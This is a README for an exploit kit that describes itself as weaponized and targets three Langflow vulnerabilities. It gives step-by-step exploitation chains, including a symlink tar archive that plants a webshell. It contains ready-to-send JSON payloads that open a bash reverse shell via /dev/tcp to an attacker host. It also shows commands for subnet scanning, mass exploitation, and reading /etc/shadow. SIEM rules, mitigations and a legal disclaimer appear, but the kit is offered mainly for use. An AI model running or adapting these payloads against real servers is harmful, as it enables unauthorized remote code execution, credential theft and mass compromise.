# Langflow Multi-CVE Exploit Kit **CVE-2026-7524 (Path Traversal) | CVE-2026-7700 (Lambda eval) | CVE-2026-7687 (CodeParser CMD Injection)** **Military-Grade Multi-Vector RCE Exploitation Framework** ![Severity](https://img.shields.io/badge/Severity-Critical-red) ![CVSS](https://img.shields.io/badge/CVSS-9.8-red) ![Status](https://img.shields.io/badge/Status-Weaponized-red) --- ## Overview This kit provides weaponized exploitation for three critical Langflow vulnerabilities affecting versions 1.0.0 through 1.9.1: | CVE | Component | Type | Versions | CVSS | Auth Required | |-----|-----------|------|----------|------|---------------| | **CVE-2026-7524** | Archive Extraction (Docling, NVIDIA, Video, Unstructured, Read File) | Path Traversal / Symlink | 1.0.0 - 1.9.1 | 9.8 | None | | **CVE-2026-7700** | LambdaFilterComponent (`lambda_filter.py`) | `eval()` Code Injection | 1.0.0 - 1.8.4 | 9.8 | None | | **CVE-2026-7687** | CodeParser (`code_parser.py`) | Command Injection | 1.0.0 - 1.8.4 | 6.5 | None | All three vulnerabilities allow **unauthenticated remote code execution** with network access. --- ## Technical Details ### CVE-2026-7524: Path Traversal via Symlink in Archive Extraction **Root Cause:** Multiple Langflow file processing components (Docling, NVIDIA Retriever, Video File, Unstructured, Read File) extract user-supplied archives without validating symlinks. A malicious tar.gz with symlinks pointing outside the extraction directory enables arbitrary file write. **Vulnerable Code Pattern:** ```python # Langflow archive extraction (vulnerable) def extract_archive(file_path, extract_dir): with tarfile.open(file_path, "r:gz") as tar: tar.extractall(extract_dir) # NO SYMLINK VALIDATION ``` **Exploitation Chain:** 1. Create tar.gz with payload file + symlink pointing to target path (e.g., `../../../../tmp/shell.jsp`) 2. Upload to any vulnerable endpoint (`/api/v1/upload/archive`, `/api/v1/docling/`, etc.) 3. Archive extraction follows symlink → writes webshell to web root 4. Access webshell for persistent RCE **Affected Endpoints:** - `/api/v1/upload/archive` - `/api/v1/docling/extract` - `/api/v1/nvidia/extract` - `/api/v1/video/extract` - `/api/v1/unstructured/extract` - `/api/v1/read-file/extract` --- ### CVE-2026-7700: LambdaFilterComponent `eval()` Code Injection **Root Cause:** The `LambdaFilterComponent` in `src/lfx/src/lfx/components/llm_operations/lambda_filter.py` uses Python's `eval()` on user-supplied lambda expressions without sanitization. **Vulnerable Code Pattern:** ```python # lambda_filter.py def filter(self, data: dict, lambda_expression: str) -> dict: func = eval(lambda_expression) # DIRECT EVAL - NO SANITIZATION return func(data) ``` **Exploitation:** ```json POST /api/v1/components/LambdaFilterComponent { "component": "LambdaFilterComponent", "params": { "lambda_expression": "lambda x: __import__('subprocess').run(['bash','-c','bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'])", "field": "text" } } ``` --- ### CVE-2026-7687: CodeParser.parse_callable_details Command Injection **Root Cause:** The `CodeParser.parse_callable_details` function in `src/lfx/src/lfx/custom/code_parser/code_parser.py` passes user-supplied code to a shell command without proper escaping. **Vulnerable Code Pattern:** ```python # code_parser.py def parse_callable_details(self, code: str, function_name: str) -> dict: # Vulnerable: user code passed to shell result = subprocess.run(f"python -c \"{code}\"", shell=True, capture_output=True) return result ``` **Exploitation:** ```json POST /api/v1/components/CodeParser { "component": "CodeParser", "params": { "code": "def test():\n import os\n os.system('bash -c \"bash -i >& /dev/tcp/10.0.0.5/4444 0>&1\"')\n return True", "function_name": "test" } } ``` --- ## Repository Structure ``` langflow_multi_cve/ ├── requirements.txt # Python dependencies ├── scanner.py # Async scanner with vulnerability fingerprinting ├── exploit.py # Multi-CVE exploitation framework └── README.md # This file ``` --- ## Quick Start ### 1. Install Dependencies ```bash python3.11 -m venv .venv source .venv/bin/activate pip install --upgrade pip pip install -r requirements.txt ``` ### 2. Reconnaissance Scan ```bash # CIDR sweep python scanner.py -n 10.0.0.0/24 -o scan_results.json # Single target python scanner.py -t 10.0.0.50 # Target list python scanner.py -f targets.txt --threads 200 # Sample output: # Target: 10.0.0.50 # Status: VULNERABLE (confidence: 92%) # >>> CVE-2026-7524 CONFIRMED # >>> CVE-2026-7700 CONFIRMED # → http/7860: Langflow 1.8.4 # → Archive upload endpoint accessible # → LambdaFilterComponent endpoint accessible ``` ### 3. Exploitation ```bash # Full chain with reverse shell (all CVEs) python exploit.py -t 10.0.0.50 --reverse --lhost 10.0.0.5 --lport 4444 # Specific CVE only python exploit.py -t 10.0.0.50 --cve 7524 --lhost 10.0.0.5 --lport 4444 python exploit.py -t 10.0.0.50 --cve 7700 -c "cat /etc/passwd" python exploit.py -t 10.0.0.50 --cve 7687 -c "whoami" # Command injection only python exploit.py -t 10.0.0.50 --cve 7687 -c "id; cat /etc/shadow" # Mass exploitation python exploit.py -f targets.txt --reverse --lhost 10.0.0.5 -o results.json -w 20 ``` --- ## Exploit Module API ### Direct Function Calls ```python from exploit import ( exploit_cve2026_7524, exploit_cve2026_7700, exploit_cve2026_7687, run_exploit_chain, mass_exploit, ) # CVE-2026-7524: Path traversal + webshell ok, shell_url = exploit_cve2026_7524("10.0.0.50", lhost="10.0.0.5", lport=4444) # CVE-2026-7700: Lambda eval injection ok, output = exploit_cve2026_7700("10.0.0.50", command="id") ok, output = exploit_cve2026_7700("10.0.0.50", lhost="10.0.0.5", lport=4444) # CVE-2026-7687: CodeParser command injection ok, output = exploit_cve2026_7687("10.0.0.50", command="id") ok, output = exploit_cve2026_7687("10.0.0.50", lhost="10.0.0.5", lport=4444) # Full chain sessions = run_exploit_chain("10.0.0.50", cve="all", reverse_shell=True, lhost="10.0.0.5", lport=4444) # Mass exploitation results = mass_exploit(["10.0.0.50", "10.0.0.51"], reverse_shell=True, lhost="10.0.0.5", lport=4444) ``` --- ## Detection & Mitigation ### Network Indicators | Indicator | Description | |-----------|-------------| | POST `/api/v1/upload/archive` with `.tar.gz` | Archive upload (CVE-2026-7524) | | POST `/api/v1/components/LambdaFilterComponent` with `lambda_expression` | Code injection (CVE-2026-7700) | | POST `/api/v1/components/CodeParser` with malicious `code` | Command injection (CVE-2026-7687) | | Symlinks in tar.gz pointing outside extraction dir | CVE-2026-7524 payload | | `eval(` or `__import__('subprocess')` in lambda | CVE-2026-7700 payload | ### SIEM Detection Rules ```yaml # CVE-2026-7524 Archive Upload title: Langflow CVE-2026-7524 Archive Upload detection: selection: request_method: POST request_uri|contains: "/api/v1/upload/archive" request_body|contains: ".tar.gz" condition: selection level: critical # CVE-2026-7700 Lambda Injection title: Langflow CVE-2026-7700 Lambda Injection detection: selection: request_method: POST request_uri|contains: "/LambdaFilterComponent" request_body|contains: "lambda_expression" condition: selection level: critical # CVE-2026-7687 CodeParser Injection title: Langflow CVE-2026-7687 CodeParser Injection detection: selection: request_method: POST request_uri|contains: "/CodeParser" request_body|contains: "os.system" condition: selection level: critical ``` ### Mitigations 1. **Immediate**: Update Langflow to **>= 1.9.2** (patched versions) 2. **Network**: Restrict Langflow API to internal network only 3. **WAF**: Deploy rules blocking: - Archive uploads with symlinks - `eval(`/`__import__` in LambdaFilterComponent - `os.system`/`subprocess` in CodeParser 3. **Disable Components**: If not required, disable: - Archive processing components - LambdaFilterComponent - CodeParser component 4. **Monitoring**: Alert on webshell deployment and reverse shell callbacks --- ## Weaponization Features | Feature | Implementation | |---------|----------------| | **Multi-CVE Chain** | Single command executes all three exploitation paths | | **Symlink Archive Builder** | Auto-generates malicious tar.gz with traversal symlinks | | **Multi-Endpoint Targeting** | Tries 6+ archive upload endpoints automatically | | **Lambda/Code Payload Gen** | Auto-generates Python payloads for eval/cmd injection | | **Reverse Shell Support** | JSP webshell + Python reverse shell payloads | | **Parallel Mass Exploit** | ThreadPoolExecutor with configurable workers | | **Auto-Shell Verification** | Confirms webshell deployment post-exploit | --- ## Legal & Ethics This toolkit is provided for: - Authorized penetration testing of infrastructure you own - CISA/NCC/NCSC-aligned defensive research - Detection rule development and purple-team exercises - Red team / bug bounty programmes with explicit written scope **Unauthorized use against systems you do not own is a criminal offence** under CFAA (US), Computer Misuse Act (UK), GDPR Art. 32 (EU), and equivalent legislation worldwide. Langflow is a trademark of Langflow AI. No endorsement by Langflow AI is implied or intended. --- ## References | CVE | Advisory | |-----|----------| | CVE-2026-7524 | https://nvd.nist.gov/vuln/detail/CVE-2026-7524 | | CVE-2026-7700 | https://nvd.nist.gov/vuln/detail/CVE-2026-7700 | | CVE-2026-7687 | https://nvd.nist.gov/vuln/detail/CVE-2026-7687 | | IBM Security Bulletin | https://www.ibm.com/support/pages/node/7273426 | --- ## Version History | Version | Date | Changes | |---------|------|---------| | 2.0.0 | 2026-06-13 | Complete rewrite: async scanner, multi-CVE chain, archive builder | | 1.0.0 | 2026-05-27 | Initial release (basic PoC scripts) | --- ## Author Advanced Persistent Security Research Military-grade exploit engineering for authorized assessment only.